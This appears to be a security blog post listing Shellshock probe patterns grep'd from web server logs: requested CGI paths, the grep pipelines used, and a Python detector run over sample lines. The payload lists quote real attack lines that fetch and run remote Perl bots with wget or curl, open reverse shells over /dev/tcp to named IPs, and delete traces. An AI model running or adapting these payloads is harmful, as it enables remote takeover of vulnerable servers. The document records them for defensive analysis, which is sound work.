ShellShock Scans (Update)

A little grep'ing through the logs reveals the following scan patterns (entries shown in red in the original were first seen in October):

Source IPs:


Page Requests:

GET /admin.cgi HTTP/1.1
GET //cgi-bin/bash HTTP/1.0
GET /cgi-bin/bash HTTP/1.0
GET /cgi-bin/hello HTTP/1.1
GET /cgi-bin/helpme HTTP/1.0
GET /cgi-bin/info.sh HTTP/1.0
GET /cgi-bin/php5-cli? HTTP/1.1
GET /cgi-bin/php5? HTTP/1.1
GET /cgi-bin/php.fcgi HTTP/1.0
GET /cgi-bin/php? HTTP/1.1
GET /cgi-bin-sdb/printenv HTTP/1.1
GET /cgi-bin/test-cgi HTTP/1.1
GET /cgi-bin/test.cgi HTTP/1.1
GET /cgi-bin/test.sh HTTP/1.0
GET /cgi-mod/index.cgi HTTP/1.1
GET /cgi-sys/defaultwebpage.cgi HTTP/1.0
GET /cgi-sys/defaultwebpage.cgi HTTP/1.1
GET /cgi-sys/entropysearch.cgi HTTP/1.1
GET /cgi-sys/guestbook.cgi HTTP/1.0
GET /cgi-sys/php5? HTTP/1.1
GET / HTTP/1.0
GET / HTTP/1.1
GET /phppath/cgi_wrapper? HTTP/1.1
GET /phppath/php? HTTP/1.1
GET /tmUnblock.cgi HTTP/1.1 
GET /cgi-bin/contact.cgi HTTP/1.1
GET /cgi-bin/defaultwebpage.cgi HTTP/1.1
GET /cgi-bin/env.cgi HTTP/1.1
GET /cgi-bin/forum.cgi HTTP/1.1
GET /cgi-bin/hello.cgi HTTP/1.1
GET /cgi-bin/index.cgi HTTP/1.1
GET /cgi-bin/login.cgi HTTP/1.1
GET /cgi-bin/main.cgi HTTP/1.1
GET /cgi-bin/meme.cgi HTTP/1.1
GET /cgi-bin/recent.cgi HTTP/1.1
GET /cgi-bin/sat-ir-web.pl HTTP/1.1
GET /cgi-bin-sdb/printenv HTTP/1.1
GET /cgi-bin/signon.cgi HTTP/1.1
GET /cgi-bin/test-cgi.pl HTTP/1.1
GET /cgi-bin/test.sh HTTP/1.1
GET /cgi-bin/tools/tools.pl HTTP/1.1
GET /cgi-mod/index.cgi HTTP/1.1
GET /cgi-sys/defaultwebpage.cgi HTTP/1.0
GET /cgi-sys/defaultwebpage.cgi HTTP/1.1
GET /cgi-sys/entropysearch.cgi HTTP/1.1
GET / HTTP/1.1
GET /phppath/cgi_wrapper HTTP/1.1
GET /phppath/php HTTP/1.1

Payloads Referer:

() { :; }; /bin/ping -c 1 104.131.0.69
() { :; }; ping -c 11 209.126.230.74
() { :; }; ping -c 11 216.75.60.74

Payloads User Agent:

() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/jurat;curl -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat*;rm -rf /tmp/jurat\""
() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
() { :;}; /bin/bash -c \"wget http://217.12.204.127/bin\""
() { :;}; /bin/bash -c \"wget http://ellrich.com/legend.txt -O /tmp/.bash;killall -9 perl;perl /tmp/.bash\""
() { :;}; /bin/bash -c \"wget http://legendsoftwares.com/legend.txt -O /tmp/.apache;killall -9 perl;perl /tmp/.apache;rm -rf /tmp/.apache\""
() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z test.john-neil.com/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\""
() { :; }; /bin/ping -c 1 104.131.0.69"
() { :;}; /bin/ping -c 1 198.101.206.138"
() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://94.102.63.238/shell.pl -O /tmp/bot.pl;perl /tmp/bot.pl;rm -rf /tmp/bot.pl\");'"
() { :;}; /bin/bash -c \"wget -O /var/tmp/muie.png actualproduce.com/js/nice.png;perl /var/tmp/muie.png\""
() { :;}; echo('VULNZZ');system('wget http://82.165.37.214/android.txt -O /tmp/bot.pl;perl /tmp/bot.pl;rm -rf /tmp/bot.pl');"
() { ignored;};/bin/bash -i >& /dev/tcp/104.192.0.18/8888 0>&1"
() { ignored;};/bin/bash -i >& /dev/tcp/207.240.10.1/8888 0>&1"
() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nVULNZZZ!\";system(\"wget http://82.165.37.214/android.txt -O /tmp/bot.pl;perl /tmp/bot.pl;rm -rf /tmp/bot.pl\");'"

Commands used for grep'ing:

Source IPs:

grep -e "( *)" *-access.log* | cut -d ":" -f 2- | cut -d " " -f 1 | sort -u

Page Requests:

grep -e "( *)" *-access.log* | cut -d ":" -f 2- | cut -d '"' -f 2 | sort -u

Payloads Referer:

grep -e "( *)" *-access.log* | cut -d ":" -f 2- | cut -d '"' -f 4 | grep -v "^-$" | sort -u

Payloads User Agent:

grep -e "( *)" *-access.log* | cut -d ":" -f 2- | cut -d '"' -f 6- | grep -e "( *)" | sort -u
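The same four extractions (source IPs, requests, referer and user-agent payloads) done in Python over constructed sample lines in Apache combined log format, as an added example that is not part of the original post; unlike the cut-based pipeline it parses the `\"`-escaped quotes inside header values instead of leaving them in the output.

```python
import re
from collections import defaultdict


def quoted(name):
    # A quoted log field; Apache escapes embedded quotes as \" so the field
    # must accept backslash-escaped characters rather than stop at the first ".
    return r'"(?P<%s>(?:[^"\\]|\\.)*)"' % name


# Apache "combined" format: ip ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] ' + quoted("request")
    + r' (?P<status>\d{3}) (?P<bytes>\S+) ' + quoted("referer") + ' ' + quoted("agent") + '$'
)

# Shellshock probes begin a header value with an empty function definition "() {";
# the grep pattern "( *)" in the post matches the same opening.
SHELLSHOCK_RE = re.compile(r'\(\) *\{')

# Constructed sample log lines (RFC 5737 documentation addresses, not real scanners).
SAMPLE_LOG = """\
192.0.2.10 - - [25/Sep/2014:10:00:01 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 404 208 "() { :; }; /bin/ping -c 1 192.0.2.99" "() { :; }; /bin/ping -c 1 192.0.2.99"
192.0.2.11 - - [25/Sep/2014:10:00:02 +0000] "GET / HTTP/1.0" 200 1024 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Oct/2014:03:12:44 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 208 "-" "() { :;}; /bin/bash -c \\"echo testing\\""
198.51.100.7 - - [01/Oct/2014:03:12:45 +0000] "GET /cgi-bin/php? HTTP/1.1" 404 208 "-" "() { ignored;}; echo probe"
garbage line that does not parse
"""


def extract_shellshock(log_text):
    """Return sorted unique source IPs, requests and header payloads of Shellshock probes.

    A line counts as a probe when any of request, referer or user-agent carries
    the signature. Payload fields are listed only when they themselves match,
    which is stricter than the referer pipeline above (it keeps any non-"-" referer).
    """
    found = defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed or truncated line: skip it rather than abort the run
        f = m.groupdict()
        if not any(SHELLSHOCK_RE.search(f[k]) for k in ("request", "referer", "agent")):
            continue
        found["source_ips"].add(f["ip"])
        found["requests"].add(f["request"])
        for key, bucket in (("referer", "referers"), ("agent", "user_agents")):
            if SHELLSHOCK_RE.search(f[key]):
                found[bucket].add(f[key])
    return {k: sorted(v) for k, v in found.items()}


if __name__ == "__main__":
    for bucket, values in extract_shellshock(SAMPLE_LOG).items():
        print(bucket, *values, sep="\n  ")
```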
